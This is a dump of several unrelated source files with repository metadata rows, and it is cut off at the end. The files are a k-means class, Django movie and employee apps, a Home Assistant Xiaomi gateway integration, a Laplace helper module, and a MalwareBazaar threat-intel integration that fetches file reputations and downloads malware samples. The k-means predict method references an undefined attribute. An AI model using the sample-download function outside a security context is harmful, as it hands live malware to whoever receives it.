init_centroids : ndarray of shape (n_init, n_clusters_, n_features);
Contains all the initial centroids used to fit k-means
Attributes
----------
centroids_ : ndarray of shape (n_clusters, n_features)
Coordinates of cluster centers.
labels_ : ndarray of shape (n_samples,)
Labels of each samples
inertia_ : float
Sum of squared distances of samples to their closest cluster center
'''
def __init__(self, n_clusters=3, init='kmeans++', n_init=10, n_iter=100, seed=None):
# Check n_clusters
if isinstance(n_clusters, int) is False or n_clusters <= 0:
raise ValueError("'n_clusters' must be an integer and"
" strictly greater than 0. You "
"gave %s." % str(n_clusters));
# Check init
names_init = ['random', 'iter', 'kmeans++'];
if init not in names_init:
raise ValueError("'init' can only take one of three"
" values : 'random', 'iter' or 'kmeans++'"
". You gave %s." % str(init));
# Check n_init
if isinstance(n_init, int) is False or n_init <= 0:
raise ValueError("'n_init' must be an integer and"
"strictly greater than 0."
"You gave %s." % str(n_init));
# Check n_iter
if isinstance(n_iter, int) is False or n_iter <= 0:
raise ValueError("'n_iter' must be an integer and"
"be strictly greater than 0."
"You gave %s." % str(n_iter));
# Check seed
if seed is not None and (isinstance(seed, int) is not True or seed <= 0):
raise ValueError("'seed' must be an integer and strictly "
"greater than 0. You gave %s." % str(seed));
# Initialization
self.n_clusters = n_clusters;
self.init = init;
self.n_init = n_init;
self.n_iter = n_iter;
self.seed = seed;
def fit(self, X):
n_samples, n_features = X.shape;
self.inertia_ = 0.0;
self.labels_ = np.zeros((n_samples, ), dtype=int)
# Store all centroids, labels, initialization centroids and inertia
all_centroids = np.zeros((self.n_init, self.n_clusters, n_features));
all_labels = np.zeros((self.n_init, n_samples), dtype=int);
self.init_centroids = np.zeros((self.n_init, self.n_clusters, n_features));
all_inertia = np.zeros((self.n_init, ));
# Let's run k-means a finite number of times in order to select the one with
# the smallest inertia
for idx in range(0, self.n_init):
# Initializing cluster centroids
if self.init == 'random':
self.centroids_ = rand_initialisation(X, self.n_clusters, self.seed, idx+100);
self.init_centroids[idx] = self.centroids_.copy();
elif self.init == 'iter':
self.centroids_ = iter_initialisation(X, self.n_clusters);
self.init_centroids[idx] = self.centroids_.copy();
elif self.init == 'kmeans++':
self.centroids_ = kmeans_plus_plus(X, self.n_clusters, self.seed, idx+100);
self.init_centroids[idx] = self.centroids_.copy();
else:
raise ValueError("Unknown initialization method");
for iteration in range(0, self.n_iter):
inertia = 0.0;
# Array which will store the sum of the samples when they are assigned
# to the cluster (centroid) closest to them. Then we'll just do an
# arithmetic mean to find the new centroids
centroids = np.zeros((self.n_clusters, n_features));
# Array which will contain the number of samples assigned to each cluster
samp_per_cluster = np.zeros((self.n_clusters, ), dtype=int);
for sample in range(0, n_samples):
# We will calculate in all self.n_cluster_ distances for the sample
dist_samp_clusters = np.zeros((self.n_clusters, ));
for cluster in range(0, self.n_clusters):
norm = np.linalg.norm(X[sample] - self.centroids_[cluster]);
dist_samp_clusters[cluster] = np.square(norm);
# Find the closest cluster to sample
closest_cluster = dist_samp_clusters.argmin();
# Join to the sample its cluster
self.labels_[sample] = closest_cluster;
# Add this sample to the associated cluster
centroids[closest_cluster] = centroids[closest_cluster] + X[sample];
# Let's increment the number of samples contained in the cluster
samp_per_cluster[closest_cluster] = samp_per_cluster[closest_cluster] + 1;
# Add this distance to the inertia
inertia = inertia + dist_samp_clusters[closest_cluster];
# Let's calculate the new centroids
for cluster in range(0, self.n_clusters):
# 1 when the cluster does not contain any example apart from its centroid
samp_per_cluster[cluster] = max([samp_per_cluster[cluster], 1]);
# New centroids
self.centroids_[cluster] = centroids[cluster] / samp_per_cluster[cluster];
self.inertia_ = inertia;
all_centroids[idx] = self.centroids_;
all_labels[idx] = self.labels_;
all_inertia[idx] = self.inertia_;
# Let's select the best k initial centroids, k centroids, labels and inertia
# according the ones that have the smallest inertia
self.inertia_ = all_inertia[all_inertia.argmin()];
self.centroids_ = all_centroids[all_inertia.argmin()];
self.labels_ = all_labels[all_inertia.argmin()];
return self;
def predict(self, X):
n_samples, n_features = X.shape;
predictions = np.zeros((n_samples, ), dtype=int)
for sample in range(0, n_samples):
# Distance from a sample to all centroids
dist_samp_clusters = np.zeros((self.n_clusters_, ));
for cluster in range(0, self.n_clusters):
norm = np.linalg.norm(X[sample] - self.centroids_[cluster]);
dist_samp_clusters[cluster] = np.square(norm);
# Find the closest cluster to sample
closest_cluster = dist_samp_clusters.argmin();
# Join sample and its cluster
predictions[sample] = closest_cluster;
return predictions
| [
"fogangfokoa@gmail.com"
] | fogangfokoa@gmail.com |
94abf16cdab29b5744ee027acd27500c6648711c | 13b4b9cb828c6a153856b2f0c2f490ef017c5d68 | /django_movie/urls.py | 07063128758e6cfd22e3babab37b2064bbd71bd7 | [] | no_license | madik-ss/django_movie | fa967a425fd63b27ef2d9a80c1f83c5c3b6f11ab | 05272fab0409b6860207c56a5284c56433e264c0 | refs/heads/master | 2023-05-09T06:34:28.914207 | 2021-05-26T06:56:56 | 2021-05-26T06:56:56 | 370,938,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,211 | py | """django_movie URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path('admin/', admin.site.urls),
path("", include("movies.urls")),
path('', include('django.contrib.auth.urls')),
path('auth/', obtain_auth_token)
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"amega00712@gmail.com"
] | amega00712@gmail.com |
3e7ddf0ed4713c29f07ac5f4ff57568676983e62 | 79f5fe3de8a924679a4ecab5215d4536f6b08a4a | /custom_components/xiaomi_gateway3/__init__.py | 439a274c83650781edbb6708f81c0975346126e0 | [] | no_license | saar-win/Home-Assistant | 09675d765ba8d2b79f464b407cc6cbf253f515c2 | 9649aeec815b340d29f14278292a28f1aab87d08 | refs/heads/dev | 2021-11-22T18:58:04.459524 | 2021-11-11T14:30:06 | 2021-11-11T14:30:06 | 251,067,368 | 0 | 1 | null | 2021-11-11T14:30:07 | 2020-03-29T15:37:10 | JavaScript | UTF-8 | Python | false | false | 7,611 | py | import asyncio
import logging
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
from homeassistant.core import HomeAssistant, Event
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_create_clientsession
from homeassistant.helpers.entity_registry import EntityRegistry
from homeassistant.helpers.storage import Store
from .core.gateway3 import Gateway3
from .core.utils import DOMAIN, XiaomiGateway3Debug
from .core.xiaomi_cloud import MiCloud
_LOGGER = logging.getLogger(__name__)
DOMAINS = ['binary_sensor', 'climate', 'cover', 'light', 'remote', 'sensor',
'switch', 'alarm_control_panel']
CONF_DEVICES = 'devices'
CONF_DEBUG = 'debug'
CONF_BUZZER = 'buzzer'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_DEVICES): {
cv.string: vol.Schema({
vol.Optional('occupancy_timeout'): cv.positive_int,
}, extra=vol.ALLOW_EXTRA),
},
vol.Optional(CONF_BUZZER): cv.boolean,
vol.Optional(CONF_DEBUG): cv.string,
}, extra=vol.ALLOW_EXTRA),
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass: HomeAssistant, hass_config: dict):
config = hass_config.get(DOMAIN) or {}
if 'disabled' in config:
# for dev purposes
return False
hass.data[DOMAIN] = {
'config': config,
'debug': _LOGGER.level > 0 # default debug from Hass config
}
config.setdefault('devices', {})
await _handle_device_remove(hass)
# utils.migrate_unique_id(hass)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Support two kind of enties - MiCloud and Gateway."""
# entry for MiCloud login
if 'servers' in entry.data:
return await _setup_micloud_entry(hass, entry)
# migrate data (also after first setup) to options
if entry.data:
hass.config_entries.async_update_entry(entry, data={},
options=entry.data)
await _setup_logger(hass)
# add options handler
if not entry.update_listeners:
entry.add_update_listener(async_update_options)
config = hass.data[DOMAIN]['config']
hass.data[DOMAIN][entry.entry_id] = \
Gateway3(**entry.options, config=config)
hass.async_create_task(_setup_domains(hass, entry))
return True
async def async_update_options(hass: HomeAssistant, entry: ConfigEntry):
await hass.config_entries.async_reload(entry.entry_id)
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
# check unload cloud integration
if entry.entry_id not in hass.data[DOMAIN]:
return
# remove all stats entities if disable stats
if not entry.options.get('stats'):
suffix = ('_gateway', '_zigbee')
registry: EntityRegistry = hass.data['entity_registry']
remove = [
entity.entity_id
for entity in list(registry.entities.values())
if (entity.config_entry_id == entry.entry_id and
entity.unique_id.endswith(suffix))
]
for entity_id in remove:
registry.async_remove(entity_id)
gw = hass.data[DOMAIN][entry.entry_id]
gw.stop()
return all([
await hass.config_entries.async_forward_entry_unload(entry, domain)
for domain in DOMAINS
])
async def _setup_domains(hass: HomeAssistant, entry: ConfigEntry):
# init setup for each supported domains
await asyncio.gather(*[
hass.config_entries.async_forward_entry_setup(entry, domain)
for domain in DOMAINS
])
gw: Gateway3 = hass.data[DOMAIN][entry.entry_id]
gw.start()
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, gw.stop)
async def _setup_micloud_entry(hass: HomeAssistant, config_entry):
data: dict = config_entry.data.copy()
session = async_create_clientsession(hass)
hass.data[DOMAIN]['cloud'] = cloud = MiCloud(session, data['servers'])
if 'service_token' in data:
# load devices with saved MiCloud auth
cloud.auth = data
devices = await cloud.get_devices()
else:
devices = None
if devices is None:
_LOGGER.debug(f"Login to MiCloud for {config_entry.title}")
if await cloud.login(data['username'], data['password']):
# update MiCloud auth in .storage
data.update(cloud.auth)
hass.config_entries.async_update_entry(config_entry, data=data)
devices = await cloud.get_devices()
if devices is None:
_LOGGER.error("Can't load devices from MiCloud")
else:
_LOGGER.error("Can't login to MiCloud")
# load devices from or save to .storage
store = Store(hass, 1, f"{DOMAIN}/{data['username']}.json")
if devices is None:
_LOGGER.debug("Loading a list of devices from the .storage")
devices = await store.async_load()
else:
_LOGGER.debug(f"Loaded from MiCloud {len(devices)} devices")
await store.async_save(devices)
if devices is None:
_LOGGER.debug("No devices in .storage")
return False
# TODO: Think about a bunch of devices
if 'devices' not in hass.data[DOMAIN]:
hass.data[DOMAIN]['devices'] = devices
else:
hass.data[DOMAIN]['devices'] += devices
default_devices = hass.data[DOMAIN]['config']['devices']
for device in devices:
default_devices[device['did']] = {'device_name': device['name']}
return True
async def _handle_device_remove(hass: HomeAssistant):
"""Remove device from Hass and Mi Home if the device is renamed to
`delete`.
"""
async def device_registry_updated(event: Event):
if event.data['action'] != 'update':
return
registry = hass.data['device_registry']
hass_device = registry.async_get(event.data['device_id'])
# check empty identifiers
if not hass_device or not hass_device.identifiers:
return
identifier = next(iter(hass_device.identifiers))
# handle only our devices
if identifier[0] != DOMAIN or hass_device.name_by_user != 'delete':
return
# remove from Mi Home
for gw in hass.data[DOMAIN].values():
if not isinstance(gw, Gateway3):
continue
gw_device = gw.get_device(identifier[1])
if not gw_device:
continue
gw.debug(f"Remove device: {gw_device['did']}")
gw.miio.send('remove_device', [gw_device['did']])
break
# remove from Hass
registry.async_remove_device(hass_device.id)
hass.bus.async_listen('device_registry_updated', device_registry_updated)
async def _setup_logger(hass: HomeAssistant):
entries = hass.config_entries.async_entries(DOMAIN)
any_debug = any(e.options.get('debug') for e in entries)
# only if global logging don't set
if not hass.data[DOMAIN]['debug']:
# disable log to console
_LOGGER.propagate = not any_debug
# set debug if any of integrations has debug
_LOGGER.setLevel(logging.DEBUG if any_debug else logging.NOTSET)
# if don't set handler yet
if any_debug and not _LOGGER.handlers:
handler = XiaomiGateway3Debug(hass)
_LOGGER.addHandler(handler)
info = await hass.helpers.system_info.async_get_system_info()
info.pop('timezone')
_LOGGER.debug(f"SysInfo: {info}")
| [
"saar1122@gmail.com"
] | saar1122@gmail.com |
decb4d0baec38c32d020228dd660883d73f27f13 | d7bc9f6a968de928f2bfc82aee93762c3b893c23 | /applications/persona/views.py | 8eb0996b561e588e75c07f57d364ffc7b3a7d814 | [] | no_license | Diego-David/Prueba2 | 04e47d4a1fbfd5c8f89a0f7b46deb4f728ca4916 | 261ca23d34ea1d59a6d79e3ce2ef5d524a0ad052 | refs/heads/master | 2023-07-06T19:00:24.604487 | 2021-07-22T04:00:07 | 2021-07-22T04:00:07 | 376,198,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,545 | py | from applications.persona.forms import EmpleadoForm
from applications import departamento
from applications.departamento.models import Departamento
from django.shortcuts import render
from django.views.generic import (ListView, DetailView,
CreateView,
TemplateView,
UpdateView,
DeleteView
)
from django.urls import reverse_lazy
# forms
from .models import Empleado
# Create your views here.
"""
# QUEREMOS CREAR 5 VISTAS:
# 1.- LISTAR TODOS LOS EMPLEADOS DE LA EMPRESA
"""
# Importamos los modelos con los que vamos a trabajar
from .models import Empleado, Habilidades
class InicioView(TemplateView):
""" vista de la pag de INICIO """
template_name = 'inicio.html'
class ListaAllEmpleados(ListView):
template_name = 'persona/list_all.html'
paginate_by = 4 # <=========PARA HACER LA PAGINACIÓN
ordering = 'id'
# model = Empleado
def get_queryset(self):
print('*************')
palabra_clave = self.request.GET.get("kword", '')
lista = Empleado.objects.filter(
first_name__icontains = palabra_clave
)
print('Lista resultado: ', lista)
return lista
class ListaEmpleadosAdmin(ListView):
template_name = 'persona/lista_empleados.html'
paginate_by = 10 # <=========PARA HACER LA PAGINACIÓN
ordering = 'id'
context_object_name = 'empleados'
model = Empleado
"""
# 2.- QUEREMOS LISTAR A TODOS LOS EMPLEADOS QUE PERTENECEN A UN ÁREA DE LA EMPRESA
"""
class ListByAreaEmpleado(ListView):
template_name = 'persona/list_emple_area.html'
context_object_name = 'empleados'
"""
queryset = Empleado.objects.filter(
departamento__name = 'Gerente General'
)
"""
# oTRA FORMA DE HACER LOS FILTORS PARA MOSTRAR EN EL FORMULARIO:
def get_queryset(self):
area = self.kwargs['namev']
lista = Empleado.objects.filter(
departamento__shor_name = area
)
return lista
"""
# 3.- QUEREMOS LISTAR A LOS EMPLEADOS ingresando una PALABRA CLAVE
"""
class ListEmpleadosByKword(ListView):
template_name = 'persona/by_kword.html'
context_object_name = 'empleados'
def get_queryset(self):
print('*************')
palabra_clave = self.request.GET.get("kword", '')
lista = Empleado.objects.filter(
first_name = palabra_clave
)
print('Lista resultado: ', lista)
return lista
"""
# 4.- QUEREMOS LISTAR las HABILIDADES
"""
class ListHabilidadesEmpleados(ListView):
template_name = 'persona/habilidades.html'
context_object_name = 'habilidades_object'
"""
def get_queryset(self):
empleado = Empleado.objects.get(id=1)
#print(empleado.habilidades.all())
return empleado.habilidades.all()
"""
def get_queryset(self):
print("==============++++++++++++++")
clave_habilidad = self.request.GET.get("habilidad", '')
list_habilidad = Habilidades.objects.filter(
habilidad = clave_habilidad
)
print ("=======================================================", type (id))
return list_habilidad
class EmpleadoDetailView(DetailView):
model = Empleado
template_name = "persona/detail_empleado.html"
def get_context_data(self, **kwargs):
context = super(EmpleadoDetailView, self).get_context_data(**kwargs)
context['titulo']='Empleado del mes'
return context
class SuccesView(TemplateView):
template_name = "persona/succes.html"
class EmpleadoCreateView(CreateView):
model = Empleado
template_name = "persona/createview_registrarPer.html"
# fields = ['first_name', 'last_name', 'job', 'habilidades'] # Así llamo a los que quiera
# fields = ('__all__') # así llamo a todos los campos para mostrar en el FORM
form_class = EmpleadoForm
success_url = reverse_lazy('persona_app:empleados_admin')
class EmpleadoUpdateView(UpdateView):
model = Empleado
template_name = "persona/persona_update.html"
fields = ['first_name',
'last_name',
'job',
'departamento',
'habilidades'
]
success_url = reverse_lazy('persona_app:empleados_admin')
class SuccesViewDelete(TemplateView):
template_name = "persona/successdelete.html"
class EmpleadoDeleteView(DeleteView):
model = Empleado
template_name = "persona/deleteview.html"
success_url = reverse_lazy('persona_app:empleados_admin')
| [
"diego.gavilanes8343@utc.edu.ec"
] | diego.gavilanes8343@utc.edu.ec |
62aaacaaabe60a38b126cdf14ff87d91ffe8e9f2 | 5d5d74a611b92e8ca9a666d5772e833bf0991edf | /pattern/prblm11.py | 3aeab091dfa78b4a398ca08d1a7c24262d16b2d7 | [] | no_license | swastikkalyane27/prbml | 4aa5ade9b944a156f1a06f069ade0993e9b10017 | 22b0051ecb12235dd0c6f54a5917a12c329f96e4 | refs/heads/master | 2023-06-16T04:20:45.168136 | 2021-07-09T05:57:44 | 2021-07-09T05:57:44 | 384,338,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | # 1
# 121
# 12321
# 1234321
# 123454321 | [
"swastik.kalyane27@gmail.com"
] | swastik.kalyane27@gmail.com |
4671be4985ea23943720181810dd6cfc8ee9eb62 | 038679b06ec65ffe64e9cc99345f5766941f94db | /var_funs.py | 1a10f3491f48ac23241e2aede210ed8125de4104 | [] | no_license | apreziosir/Flow_PT | cd3b7258793bda641ba7d12e4af0d718aa6a384d | 6dd09f20178eae6b2e19e8ed42a1376cae7d3f05 | refs/heads/master | 2021-07-13T08:11:27.874551 | 2017-10-17T22:26:33 | 2017-10-17T22:26:33 | 100,315,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,423 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Functions for script of Laplace's equation for pressure in Particle Tracking
model
Antonio Preziosi-Ribero / Universidad Nacional de Colombia
August 2017
"""
import numpy as np
# =============================================================================
# This function calculates the hm for the Laplace's equation of the particle
# tracking model
# =============================================================================
def alt_media(U, H, d):
if H/d <= 0.34:
hm = 0.28 * (U ** 2 / (2 * 9.81)) * ((H/d) / 0.34) ** (3/8)
else:
hm = 0.28 * (U ** 2 / (2 * 9.81)) * ((H/d) / 0.34) ** (3/2)
return hm
# =============================================================================
# Filling the vector with the boundary conditions that are going to be used for
# the Laplace's problem
# =============================================================================
def fill_tbc(Lx, Nx, hm, Lambda):
Tbc = np.linspace(0, Lx, Nx) # Defining vector
k = 2 * np.pi / Lambda # Defining k
dx = Lx / Nx # Calculating dx
for i in range(0, len(Tbc)):
# Real function - should work if test function works
# Tbc[i] = hm * np.sin(k * ((dx/2) + i * dx))
# Test function - just to test the program under known conditions
Tbc[i] = 7 * ((dx/2) + i * dx)
return Tbc
# =============================================================================
# Filling the bottom boundary condition according to problem
# It must vary (constant, linear)
# =============================================================================
def fill_bbc(Lx, Ly, Nx, hm, Lambda, bbc):
Bbc = np.linspace(0, Lx, Nx) # Defining vector
k = 2 * np.pi / Lambda # Defining k
dx = Lx / Nx # Calculating dx
for i in range(0, len(Bbc)):
# Sine wave with hydrostatic increment (just water column)
# Bbc[i] = hm * np.sin(k * ((dx/2) + i * dx)) + bbc
# Constant value
# Bbc[i] = bbc
# Test function - just to test the program under known conditions
Bbc[i] = 6 * ((dx/2) + i * dx) * (-Ly) + 7 * ((dx/2) + i *
dx) - 8 * Ly
return Bbc
# =============================================================================
# Filling left boundary condition - According to top boundary condition
# =============================================================================
def fill_lbc(Ly, Ny, Tbc):
Lbc = np.linspace(0, Ly, Ny)
dy = Ly / Ny
for i in range(0, len(Lbc)):
# Hydrostatic increment of pressure in the left boundary
# Lbc[i] = Tbc + dy / 2 + i * dy
# Constant value of pressure left boundary
# Lbc[i] = Tbc
# Test function - just to test the program under known conditions
Lbc[i] = -8 * ((dy/2) + i * dy)
return Lbc
# =============================================================================
# Filling right boundary condition - According to top boundary condition
# =============================================================================
def fill_rbc(Lx, Ly, Nx, Ny, Tbc):
Rbc = np.linspace(0, Ly, Ny)
dy = Ly / Ny
dx = Lx / Nx
for i in range(0, len(Rbc)):
# Hydrostatic increment of pressure in the left boundary
# Rbc[i] = Tbc + dy / 2 + i * dy
# Constant value of pressure left boundary
# Rbc[i] = Tbc
# Test function - just to test the program under known conditions
Rbc[i] = -6 * Lx * ((dy/2) + i * dy) + 7 * ((dx/2) + i * dx)
return Rbc
# =============================================================================
# Calculate positions of nodes (works for x and y)
# =============================================================================
def positions(Lx, Ly, Nx, Ny):
dx = Lx / Nx
dy = Ly / Ny
xn = np.zeros((Nx * Ny, 3)) # Node positions matrix
for ic in range(0, Nx * Ny):
xn[ic, 0] = int(ic) # Node id
xn[ic, 1] = dx / 2 + (ic % Nx) * dx # Node x position
xn[ic, 2] = -dy / 2 - (ic % Ny) * dy # Node y position
return xn
| [
"apreziosir@unal.edu.co"
] | apreziosir@unal.edu.co |
aad3ab1abf6d1299b48f107d036bf3d579323977 | 2a1b8a671aceda6bc446f8ce26400aa84fa444a6 | /Packs/MalwareBazaar/Integrations/MalwareBazaar/MalwareBazaar.py | 99c29c578cf90e95546b390eaa97f99d11e81baa | [
"MIT"
] | permissive | demisto/content | 6d4722d46f0ff0beea2748e9f7de585bf91a78b4 | 890def5a0e0ae8d6eaa538148249ddbc851dbb6b | refs/heads/master | 2023-09-04T00:02:25.618032 | 2023-09-03T21:56:22 | 2023-09-03T21:56:22 | 60,525,392 | 1,023 | 1,921 | MIT | 2023-09-14T20:55:24 | 2016-06-06T12:17:02 | Python | UTF-8 | Python | false | false | 12,931 | py | import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
import copy
import urllib3
QUERIES = {
"tag": "get_taginfo",
"signature": "get_siginfo",
"file_type": "get_file_type",
"clamav": "get_clamavinfo",
"imphash": "get_imphash",
"yara_rule": "get_yarainfo",
"issuer_cn": "get_issuerinfo"
}
EXCEPTIONS_MESSAGES = {
'illegal_sha256_hash': 'Illegal SHA256 hash provided.',
'file_not_found': 'The file was not found or is unknown to MalwareBazaar.',
'hash_not_found': 'The file (hash) you wanted to query is unknown to MalwareBazaar.',
'illegal_hash': 'The hash you provided is not a valid SHA256 hash.',
'user_blacklisted': 'Your API key is blacklisted.',
'no_results': 'Your query yield no results.',
'not_found': 'Tha value you wanted to query is unknown to MalwareBazaar.',
'illegal': 'The text you provided is not valid.'
}
VENDOR_NAME = 'MalwareBazaar'
LIST_HEADERS = ['md5_hash', 'sha256_hash', 'sha1_hash', 'file_name', 'file_type', 'file_size', 'tags', 'first_seen',
'last_seen']
FILE_HEADERS = ['md5_hash', 'sha256_hash', 'sha1_hash', 'file_name', 'file_type', 'file_size', 'tags', 'first_seen',
'last_seen', 'signature', 'ssdeep', 'reporter', 'imphash', 'yara_rules_names']
class Client(BaseClient):
def __init__(self, server_url, verify, proxy, headers, api_key):
self.api_key = api_key
super().__init__(base_url=server_url, verify=verify, proxy=proxy, headers=headers)
def file_request(self, hash):
response = self._http_request('POST',
files={
'query': (None, "get_info"),
'hash': (None, hash)
})
return response
def malwarebazaar_download_sample_request(self, sha256_hash):
response = self._http_request('POST',
files={
'query': (None, "get_file"),
'sha256_hash': (None, sha256_hash)
},
resp_type="response")
return response
def malwarebazaar_comment_add_request(self, sha256_hash, comment):
if self.api_key is None:
raise Exception('API Key is required for this command')
response = self._http_request('POST',
headers={"API-KEY": self.api_key},
files={
'query': (None, "add_comment"),
'sha256_hash': (None, sha256_hash),
'comment': (None, comment)
})
return response
def malwarebazaar_samples_list_request(self, sample_input, value, limit, query):
files = {
'query': (None, query),
sample_input: (None, value),
}
if not sample_input == 'issuer_cn':
files.update({'limit': (None, limit)})
response = self._http_request('POST',
files=files)
return response
def file_process(hash, reliability, raw_response, response_data) -> CommandResults:
"""
creates CommandResults for every file in the list inserted to file_command
Args:
hash:
raw_response:
response_data:
Returns:
CommandResults for the relevant file
"""
dbot_score = Common.DBotScore(
indicator=hash,
indicator_type=DBotScoreType.FILE,
integration_name=VENDOR_NAME,
score=Common.DBotScore.BAD,
reliability=reliability,
malicious_description=response_data.get('comment')
)
signature = response_data.get('signature')
relationship = EntityRelationship(name='indicator-of',
entity_a=hash,
entity_a_type='File',
entity_b=signature,
entity_b_type=FeedIndicatorType.indicator_type_by_server_version(
"STIX Malware"),
source_reliability=reliability,
brand=VENDOR_NAME)
table_name = f'{VENDOR_NAME} File reputation for: {hash}'
humam_readable_data = copy.deepcopy(response_data)
humam_readable_data.update({'yara_rules_names': []})
rules = humam_readable_data.get('yara_rules', [])
rules = rules if rules else []
for rule in rules:
humam_readable_data.get('yara_rules_names').append(rule.get('rule_name'))
md = tableToMarkdown(table_name, t=humam_readable_data, headerTransform=string_to_table_header, removeNull=True,
headers=FILE_HEADERS)
file_object = Common.File(md5=response_data.get('md5_hash'), sha256=response_data.get('sha256_hash'),
sha1=response_data.get('sha1_hash'), size=response_data.get('file_size'),
file_type=response_data.get('file_type'), dbot_score=dbot_score,
relationships=[relationship])
return CommandResults(
outputs_prefix='MalwareBazaar.File',
outputs_key_field='md5_hash',
outputs=response_data,
raw_response=raw_response,
indicator=file_object,
relationships=[relationship],
readable_output=md
)
def check_query_status(response, is_list_command=False, sample_type=None):
"""
checks whether the request to the API returned with the proper result
Args:
sample_type: string, type of sample (tag, signature, etc.)
is_list_command: bool
response: response from API
"""
not_found_error = '_not_found'
illegal_error = 'illegal_'
query_status = response.get("query_status")
if not query_status == "ok" and not query_status == "success":
if is_list_command:
if query_status == sample_type + not_found_error:
raise Exception(EXCEPTIONS_MESSAGES.get('not_found'))
if query_status == sample_type + illegal_error:
raise Exception(EXCEPTIONS_MESSAGES.get('illegal'))
if query_status in EXCEPTIONS_MESSAGES:
raise Exception(EXCEPTIONS_MESSAGES.get(query_status))
else:
raise Exception(query_status)
def file_command(client: Client, args: Dict[str, Any]) -> List[CommandResults]:
"""
Args:
client:
args: file - list of files hash
Returns:
file reputation for the given hashes
"""
reliability = demisto.params().get('integrationReliability', DBotScoreReliability.A)
if DBotScoreReliability.is_valid_type(reliability):
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)
else:
raise Exception("Please provide a valid value for the Source Reliability parameter.")
file_list = argToList(args.get('file'))
command_results: List[CommandResults] = []
for hash in file_list:
raw_response = client.file_request(hash)
if raw_response.get('query_status') == 'hash_not_found':
command_results.append(create_indicator_result_with_dbotscore_unknown(hash, DBotScoreType.FILE, reliability))
else:
check_query_status(raw_response)
response_data = raw_response.get('data')[0]
if file_name := response_data.get('file_name'):
response_data['file_name'] = '' if file_name == 'file' else file_name
command_results.append(file_process(hash, reliability, raw_response, response_data))
return command_results
def malwarebazaar_download_sample_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sha256_hash of file
Returns:
zip file contains the malware sample from MalwareBazaar
"""
sha256_hash = args.get("sha256_hash")
response = client.malwarebazaar_download_sample_request(sha256_hash)
filename = f'{sha256_hash}.zip'
return fileResult(filename, response.content)
def malwarebazaar_comment_add_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sha256_hash of file, comment to add in context of this file
Returns:
query status of the request to MalwareBazaar (success or error)
"""
sha256_hash = args.get("sha256_hash")
comment = args.get("comment")
response = client.malwarebazaar_comment_add_request(sha256_hash, comment)
check_query_status(response)
readable_output = f'Comment added to {sha256_hash} malware sample successfully'
outputs = {
'sha256_hash': sha256_hash,
'comment': comment,
}
return CommandResults(
outputs_prefix='MalwareBazaar.MalwarebazaarCommentAdd',
outputs_key_field='sha256_hash',
outputs=outputs,
readable_output=readable_output,
raw_response=response,
)
def malwarebazaar_samples_list_command(client: Client, args: Dict[str, Any]) -> CommandResults:
"""
Args:
client:
args: sample_type - {clamav, file_type, imphash, signature, tag, yara_rule}
sample_value
limit (optional) - number of results (default 50)
Returns:
query results from API
"""
sample_input = args.get("sample_type") or ''
value = args.get("sample_value")
limit = arg_to_number(args.get("limit")) if "limit" in args else None
page = arg_to_number(args.get("page")) if "page" in args else None
page_size = arg_to_number(args.get("page_size")) if "page_size" in args else None
# # if limit was provided, request limit results from api, else, use pagination (if nothing is used 50 results will
# # be requested as default)
if limit is None:
if page is not None and page_size is not None:
if page <= 0:
raise Exception('Chosen page number must be greater than 0')
limit = page_size * page
else:
limit = 50
# # 1000 is the maximal value we can get from tha API
limit = min(limit, 1000)
query = QUERIES.get(sample_input)
response = client.malwarebazaar_samples_list_request(sample_input, value, limit, query)
check_query_status(response, True, args.get('sample_type'))
response_data = response.get('data')
# take required results from response if pagination by page and page_size
if page is not None and page_size is not None:
response_data = response_data[-1 * page_size:]
readable_output = tableToMarkdown('Sample List', t=response_data, headerTransform=string_to_table_header,
removeNull=True, headers=LIST_HEADERS)
return CommandResults(
outputs_prefix='MalwareBazaar.MalwarebazaarSamplesList',
outputs_key_field='sha256_hash',
readable_output=readable_output,
outputs=response_data,
raw_response=response
)
def test_module(client: Client) -> None:
if client.api_key:
response = client.malwarebazaar_comment_add_request(
"094fd325049b8a9cf6d3e5ef2a6d4cc6a567d7d49c35f8bb8dd9e3c6acf3d78d",
"test comment")
else:
response = client.malwarebazaar_samples_list_request('tag', 'TrickBot', '2', QUERIES.get('tag'))
check_query_status(response)
return_results('ok')
def main() -> None:
params: Dict[str, Any] = demisto.params()
args: Dict[str, Any] = demisto.args()
url = params.get('url')
api_key = params.get('credentials', {}).get('password') or None
verify_certificate: bool = not params.get('insecure', False)
proxy = params.get('proxy', False)
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
urllib3.disable_warnings()
client: Client = Client(urljoin(url, '/api/v1/'), verify_certificate, proxy, headers={}, api_key=api_key)
commands = {
'file': file_command,
'malwarebazaar-download-sample': malwarebazaar_download_sample_command,
